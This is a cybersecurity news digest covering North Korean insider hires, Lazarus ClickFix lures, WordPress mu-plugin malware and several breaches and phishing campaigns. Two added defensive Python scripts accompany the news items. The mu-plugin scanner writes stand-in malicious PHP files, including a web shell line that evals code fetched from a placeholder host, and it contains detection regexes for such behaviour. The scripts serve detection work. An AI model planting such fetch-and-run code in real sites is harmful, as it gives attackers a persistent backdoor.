Daily News Update: Monday, April 1, 2025 (Australia/Melbourne)

DPRK operatives have infiltrated businesses worldwide as remote hires, gaining privileged access and pivoting to third parties. Lazarus adopts "ClickFix" tactics, luring job seekers and now targeting non-technical roles. Attackers abuse WordPress mu-plugins, which load on every request, to inject malicious code stealthily.

North Korean Infiltration a Serious Threat to Global Businesses

North Korean nationals have infiltrated businesses globally, securing full-time employment as engineers and specialists with privileged access to enterprise systems.

DTEX reports active investigations within 7% of their Fortune Global 2000 customer base, estimating that thousands of critical infrastructure organisations have been infiltrated. These individuals often have "the keys to the kingdom," with the ability to manage access rights, install software, and write code.

Adam Meyers, head of CrowdStrike’s counter adversary operations, noted that nearly 40% of their incident response cases involving North Korea were insider-threat operations.

Once hired, these individuals move quickly to infiltrate the organisation further, often pivoting to third parties and supply chains. They also install remote access tools, blending in with typical onboarding activities.

DTEX's Rob Schuett noted that North Korean workers often exhibit anomalous session behaviour: extremely long login sessions with no corresponding logout, sometimes running continuously for four to five days.

What we see with the DPRK worker is completely anomalous compared to everybody else, meaning you’ll see a login time that runs an extremely long amount of time and then there is no logout activity.

Organisations can identify potential insider threats during the hiring process by requiring remote job candidates to be on camera, paying attention to inconsistencies on resumes, and looking for a lack of communication in meetings.
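The session anomaly Schuett describes is straightforward to hunt for once login and logout events are in one place. The script below is an added example, not DTEX's or CyberScoop's code: it replays constructed authentication events and reports any session that either ran longer than a threshold or is still open with no logout. The 72-hour threshold and the sample events are assumptions for illustration.

```python
"""Added example (not DTEX's or CyberScoop's code): flag login sessions that
stay open far longer than a working day, the pattern described above.

Assumptions: events are (ISO timestamp, user, "login"/"logout") tuples, and
any session open longer than MAX_SESSION_HOURS deserves an analyst's look.
"""
from datetime import datetime

MAX_SESSION_HOURS = 72  # assumption: three days with no logout is anomalous

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    ("2025-03-24T08:55:00", "alice", "login"),
    ("2025-03-24T17:30:00", "alice", "logout"),
    ("2025-03-25T09:02:00", "alice", "login"),
    ("2025-03-25T18:01:00", "alice", "logout"),
    ("2025-03-24T07:10:00", "contractor7", "login"),
    ("2025-03-29T02:45:00", "contractor7", "logout"),  # open for ~4.8 days
    ("2025-03-27T10:00:00", "bob", "login"),            # never logs out
]


def _as_dt(value):
    """Accept either a datetime or an ISO-8601 string."""
    return value if isinstance(value, datetime) else datetime.fromisoformat(value)


def find_long_sessions(events, now, max_hours=MAX_SESSION_HOURS):
    """Return (user, login_time, hours_open, closed) for every session whose
    duration exceeds max_hours. Sessions with no logout are measured up to
    `now` and reported with closed=False."""
    now = _as_dt(now)
    open_sessions = {}  # user -> start of the session that is still open
    flagged = []
    for ts, user, action in sorted(events, key=lambda e: e[0]):
        t = _as_dt(ts)
        if action == "login":
            # A second login without a logout keeps the earliest start,
            # so the open session is measured in full.
            open_sessions.setdefault(user, t)
        elif action == "logout" and user in open_sessions:
            start = open_sessions.pop(user)
            hours = (t - start).total_seconds() / 3600
            if hours > max_hours:
                flagged.append((user, start.isoformat(), round(hours, 1), True))
    # Sessions still open at analysis time: the "no logout activity" case.
    for user, start in open_sessions.items():
        hours = (now - start).total_seconds() / 3600
        if hours > max_hours:
            flagged.append((user, start.isoformat(), round(hours, 1), False))
    return sorted(flagged)


if __name__ == "__main__":
    for user, start, hours, closed in find_long_sessions(SAMPLE_EVENTS, "2025-03-31T09:00:00"):
        state = "closed" if closed else "STILL OPEN"
        print(f"{user}: session from {start} open {hours}h ({state})")
```

On the sample data, alice's two working-day sessions pass, while contractor7's 115.6-hour session and bob's still-open 95-hour session are both reported. In production the same logic runs over VPN, IdP or EDR session records; the threshold should be tuned per role, since some service and build accounts legitimately hold long sessions.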

CyberScoop | "The North Korea worker problem is bigger than you think"


North Korean Hackers Adopt ClickFix Attacks

The Lazarus hacking group, linked to North Korea, has adopted 'ClickFix' tactics to deploy malware targeting job seekers in the cryptocurrency industry. Sekoia have dubbed the activity 'ClickFake', as an evolution of their 'Contagious Interview' campaign.

ClickFix uses fake error or verification prompts on websites or in documents that instruct the user to copy a command and run it themselves (typically PowerShell on Windows, or a shell command on macOS); the victim, rather than an exploit, launches the downloader that fetches and executes the malware.

Sekoia reports that Lazarus impersonates major cryptocurrency companies like Coinbase, KuCoin, and Kraken in their lures. The attackers have shifted focus from developers to non-technical roles in Centralised Finance (CeFi) companies, such as business developers and marketing managers. Victims are invited to remote interviews and, when attempting to record a video introduction, are presented with a fake error and instructions to run a curl command that infects them with a Go-based backdoor named 'GolangGhost'.

Once deployed, GolangGhost connects to its command and control (C2) server and can perform file operations, execute shell commands, steal Chrome cookies, and harvest system metadata.

Sekoia has published YARA rules to detect ClickFake artefacts.

Bleeping Computer | "North Korean hackers adopt ClickFix attacks to target crypto firms"

Sekoia | "From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic"


Hackers Abuse WordPress MU-Plugins

Hackers are exploiting WordPress mu-plugins ("Must-Use Plugins") to stealthily run malicious code on every page, evading detection.

Must-Use Plugins (mu-plugins) are a special class of WordPress plugin: every PHP file placed directly in wp-content/mu-plugins/ is loaded automatically on every request, cannot be deactivated from the admin dashboard, and is easy to overlook because it appears only under a separate "Must-Use" tab rather than in the regular plugin list.

Sucuri researchers have observed a rise in this technique, with attackers using the 'wp-content/mu-plugins/' directory to run three distinct types of malicious code:

  • redirect.php: Redirects visitors to a malicious website displaying a fake browser update prompt.
  • index.php: A webshell that acts as a backdoor, fetching and executing PHP code from a GitHub repository.
  • custom-js-loader.php: Loads JavaScript that replaces images with explicit content and hijacks outbound links.
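Because anything in the mu-plugins directory runs unconditionally, the most useful check is an inventory against what the site owner deliberately installed, combined with a content scan for the behaviours of the three payloads above. The script below is an added example, not Sucuri's or WordPress's code; the allowlist, the regexes and the four sample files (harmless stand-ins written to a temporary directory, with example.invalid URLs) are assumptions for illustration.

```python
"""Added example (not Sucuri's or WordPress's code): inventory
wp-content/mu-plugins/ and flag files that were not deliberately installed
or that carry the indicators seen in the three payloads described above.

Assumptions: EXPECTED_MU_PLUGINS is the site owner's own allowlist, and the
sample files below are constructed stand-ins, not the real malware.
"""
import os
import re
import tempfile

# Assumption: the only mu-plugin this site is supposed to have.
EXPECTED_MU_PLUGINS = {"site-customisations.php"}

# Behaviours of the three payloads, expressed as regexes over PHP source.
INDICATORS = {
    "remote_code_fetch": re.compile(r"(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I),
    "dynamic_eval": re.compile(r"\b(eval|assert|create_function)\s*\(|base64_decode\s*\(", re.I),
    "redirect": re.compile(r"header\s*\(\s*['\"]Location:|wp_redirect\s*\(", re.I),
    "script_injection": re.compile(r"wp_enqueue_script\s*\(|<script", re.I),
}

# Constructed stand-ins for the three malicious files plus one legitimate one.
SAMPLE_FILES = {
    "redirect.php": '<?php if (!is_admin()) { header("Location: https://example.invalid/update"); exit; }',
    "index.php": '<?php eval(file_get_contents("https://example.invalid/payload.txt"));',
    "custom-js-loader.php": "<?php add_action('wp_enqueue_scripts', function () {"
                            " wp_enqueue_script('loader', 'https://example.invalid/a.js'); });",
    "site-customisations.php": "<?php add_filter('upload_mimes', fn($m) => $m + ['svg' => 'image/svg+xml']);",
}


def build_sample_site():
    """Write the constructed files into a temporary mu-plugins directory."""
    mu_dir = os.path.join(tempfile.mkdtemp(), "wp-content", "mu-plugins")
    os.makedirs(mu_dir)
    for name, src in SAMPLE_FILES.items():
        with open(os.path.join(mu_dir, name), "w", encoding="utf-8") as f:
            f.write(src)
    return mu_dir


def scan_mu_plugins(mu_dir, expected=EXPECTED_MU_PLUGINS):
    """Return one finding per top-level .php file that is not allowlisted or
    matches an indicator. WordPress loads every top-level .php file in this
    directory on every request, so the allowlist check matters as much as
    the content check."""
    findings = []
    for name in sorted(os.listdir(mu_dir)):
        path = os.path.join(mu_dir, name)
        if not (os.path.isfile(path) and name.endswith(".php")):
            continue
        with open(path, encoding="utf-8", errors="replace") as f:
            src = f.read()
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(src))
        unexpected = name not in expected
        if unexpected or hits:
            findings.append({"file": name, "unexpected": unexpected, "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_mu_plugins(build_sample_site()):
        print(finding)
```

Run against a live site by pointing scan_mu_plugins at the real wp-content/mu-plugins/ path. The allowlist catches payloads that use no recognisable indicator, while the regexes catch a renamed file; neither substitutes for comparing file hashes against a known-good backup, which is the definitive check after a suspected compromise.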

Sucuri recommends applying security updates, disabling unnecessary plugins and themes, and protecting privileged accounts with strong credentials and multi-factor authentication.

Bleeping Computer | "Hackers abuse WordPress MU-Plugins to hide malicious code"

Check Point Confirms Breach

Check Point has confirmed a data breach, claiming it was an "old" event involving a few organisations and a portal that does not include customers' systems, production, or security architecture. A cybercrime forum user, CoreInjection, claimed to have stolen "highly sensitive" data, including internal network maps, user credentials, and proprietary source code.

Check Point stated that the breach affected only three organisations in December 2024 and was due to the abuse of compromised credentials for a portal account with limited access. Alon Gal, co-founder and CTO of Hudson Rock, initially raised concerns about the allegations but later noted that the scope of the breach is likely narrower than initially thought.

The Register | "Check Point confirms breach, but says it was 'old' data and crook made 'false' claims"


Gamaredon Phish Delivers Remcos RAT

The Russian state-backed Gamaredon group is conducting an ongoing campaign to install the Remcos RAT on Ukrainian computers. The group uses phishing emails including malicious attachments or links to malicious ZIP files hosted on remote servers, with lures purporting to relate to troop movements in Ukraine.

The malicious files execute a PowerShell script that downloads a ZIP file containing the Remcos spying tool.

Cisco Talos attributes this campaign with medium confidence to Gamaredon, who have been operating since 2013. Ukraine detected 277 incidents they attribute to the group, which is linked to the Russian FSB.

The Record | "Latest gambit for Gamaredon: Fake Ukraine troop movement documents with malicious links"


Moscow Subway System Disruption

The Moscow subway system's website and mobile application experienced disruptions that authorities attributed to "technical maintenance", though a cyberattack is the more plausible explanation.

During the outage, the website displayed a message purportedly from Ukraine's national railway operator, Ukrzaliznytsia, which was recently hit by a large-scale cyberattack disrupting their ticketing systems. Ukrainian hackers have frequently targeted Russian transport infrastructure, including previous incidents affecting Moscow's fare systems.

While authorities have not officially confirmed a cyberattack, the incident highlights the ongoing cyber conflict between Ukraine and Russia, with transport infrastructure being a frequent target.

The Record | "Moscow subway app and website disrupted in possible retaliation for Ukraine railway hack"

Lucid Phishing Platform

A phishing-as-a-service (PhaaS) platform named 'Lucid' has been targeting 169 entities in 88 countries using well-crafted messages sent on iMessage (iOS) and RCS (Android). Operated by Chinese cybercriminals known as the 'XinXin group' since mid-2023, Lucid is sold via a subscription-based model, providing access to over 1,000 phishing domains, tailored phishing sites, and spamming tools.

The threat group claims to send 100,000 smishing messages daily via Rich Communication Services (RCS) or Apple iMessage. Because these channels carry message content outside the carrier SMS path (iMessage is end-to-end encrypted, as is RCS between Google Messages clients), carrier-side spam filtering cannot inspect the messages.

The platform employs an automated attack delivery mechanism, deploying customisable phishing websites distributed primarily through text-message lures. Lucid operators use large-scale iOS and Android device farms to send the messages, impersonating shipping notices, tax alerts, or missed toll payments.

Victims are redirected to fake landing pages impersonating state government toll and parking agencies or private entities, designed to steal personal and financial information. The platform's built-in credit card validator then checks the validity of the stolen cards, which are then either sold to other cybercriminals or used directly for fraud.

Bleeping Computer | "Phishing platform 'Lucid' behind wave of iOS, Android SMS attacks"


Microsoft Uses AI to Find Bootloader Flaws

Microsoft used its AI-powered Security Copilot to discover 20 previously unknown vulnerabilities in the GRUB2, U-Boot, and Barebox open-source bootloaders. These flaws impact devices relying on UEFI Secure Boot, and if the right conditions are met, attackers can bypass security protections to execute arbitrary code on the device and deploy persistent malware.

Microsoft discovered eleven vulnerabilities in GRUB2, including integer and buffer overflows in filesystem parsers, command-handling flaws, and a side-channel in a cryptographic comparison. Nine further vulnerabilities, mainly buffer overflows that require physical access to exploit, were found in the U-Boot and Barebox bootloaders.

GRUB2, U-Boot, and Barebox released security updates for the vulnerabilities in February 2025.

Bleeping Computer | "Microsoft uses AI to find flaws in GRUB2, U-Boot, Barebox bootloaders"


British Intel Intern Pleads Guilty to Smuggling Data

Hassan Arshad, a former intern at GCHQ, has pleaded guilty to risking national security by smuggling top secret information out of a protected computer in late 2022.

Arshad transferred sensitive material onto a smartphone and then uploaded the data to a hard drive connected to his personal computer. The information related to a "tool" used by GCHQ and included the names of agency employees.

The Record | "British intel intern pleads guilty to smuggling top secret data out of protected facility"


Canadian Arrested over 2021 Texas GOP Hack

Aubrey Cottle, a Canadian man using the handle "Kirtaner", has been arrested for allegedly hacking into systems used by the Texas Republican Party in 2021 and stealing sensitive information. Cottle is charged with identity theft and faces a maximum sentence of five years in prison.

Cottle is accused of breaching Epik, a third-party hosting company, to deface and download a backup of the Texas Republican Party’s web server, which contained personal identifying information. Cottle then allegedly shared the stolen data online and publicly took credit for the attack on social media.

A search warrant issued for Cottle’s home resulted in the seizure of 20 terabytes of data, including emails claiming to have root access to Epik’s network.

The Record | "Canadian hacker arrested for allegedly stealing data from Texas Republican Party"

CyberScoop | "DOJ charges hacker for 2021 Texas GOP website defacement"


Opalsec is a reader-supported publication. To receive new posts and support my work, please consider becoming a paid subscriber!